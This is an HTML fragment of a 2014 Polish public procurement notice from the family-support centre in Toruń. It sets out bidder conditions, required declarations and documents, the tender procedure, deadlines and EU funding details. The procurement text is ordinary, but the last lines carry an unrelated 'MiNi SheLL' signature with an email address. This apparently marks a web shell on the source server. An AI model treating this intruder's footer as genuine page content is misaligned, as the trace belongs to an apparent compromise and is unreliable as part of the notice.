5. W przypadku składania oferty wspólnej np. w formie konsorcjum, o udzielenie
zamówienia mogą ubiegać się Wykonawcy, którzy ponad wyżej wymienione warunki ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia zawarcia umowy w sprawie zamówienia publicznego.

5.2. Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w ust. 6 niniejszej Specyfikacji Istotnych Warunków Zamówienia.

5.3. Z treści złożonych dokumentów i oświadczeń musi jednoznacznie wynikać, iż Wykonawca spełnia wyżej wymienione warunki. Niespełnienie chociażby jednego z wyżej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a jego oferta zostanie uznana za odrzuconą.

5.4. Zlecający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez Zlecającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zlecającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowaną usługę wymagań określonych przez Zlecającego, nie później niż w dniu, w którym upłynął termin składania ofert.

5.5.  Zlecający na podstawie art. 36 a, art. 36 b ustawy Prawo zamówień publicznych żąda od Wykonawcy wskazania na Formularzu oferty części zamówienia, której wykonanie powierzy podwykonawcom.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A Formularz oferenta:
1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu należy złożyć wypełniony i podpisany Formularz Oferenta z jednolitą ceną za kompleksową realizację przedmiotu zamówienia zał. nr 1 do SIWZ,
B Oświadczenia:   
2 Oświadczenie nr 1 o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust.1
 ustawy Prawo zamówień publicznych ( zawarte w zał. nr 2 do SIWZ)
3 Oświadczenie nr 2 o nie podleganiu wykluczeniu  na podst. art.24 ust.1 zawarte w zał. nr 3 do SIWZ 
4 Oświadczenie nr 3 o tym, że zapoznali się i treścią ogłoszenia w sprawie udzielenia
zamówienia zawarte w zał. nr 4 do SIWZ
C Dokumenty:

5 Oryginał lub kopia, poświadczona przez Wykonawcę za zgodność z oryginałem
aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.
6) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że
 Wykonawca nie zalega z opłacaniem podatków i opłat,
7 Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub 
Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega
 z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne,
8 Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i  osób zdolnych do wykonania zamówienia - w przypadku, gdy Wykonawca nie dysponuje
potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
9 Polisa ubezpieczeniowa od odpowiedzialności cywilnej lub inny dokument potwierdzający ,że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
 działalności na kwotę minimum 30.000, 00 zł lub ewentualnie oświadczenie o zobowiązaniu się do wykupienia polisy w przypadku wyboru złożonej oferty przez Zlecającego.
10 Podpisany zaakceptowany Wzór umowy stanowiący załącznik nr 5 do SIWZ,

11Propozycja harmonogramu realizacji poszczególnych zadań zgodnie  z przedmiotem
zamówienia.
12 Szczegółowy program zajęć wraz z wykazem osób prowadzących szkolenia oraz dokumentami doświadczającymi posiadanie wymaganych kwalifikacji przez trenerów i  prowadzących.
13 Inne dokumenty, W przypadku, gdy umocowanie do reprezentowania Wykonawcy nie  wynika ze stosowanego dokumentu, a w szczególności z odpisu właściwego rejestru,  zależy załączyć pełnomocnictwo dla osoby upoważnionej do podpisywania oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiattorunski.pl/7262,zamowienia-publiczne.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Toruniu
87-100 Toruń, ul. Towarowa 4-6
Telefon 56 662 87 50 Fax 56 662 87 51.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Toruniu
87-100 Toruń, ul. Towarowa 4-6
Telefon 56 662 87 50 Fax 56 662 87 51 
pokój nr 50.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn  Uwierzyć w siebie , aktywna integracja osób przebywających w rodzinach zastępczych i je opuszczających  realizowanym zgodnie z Europejskim Funduszem Społecznym Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com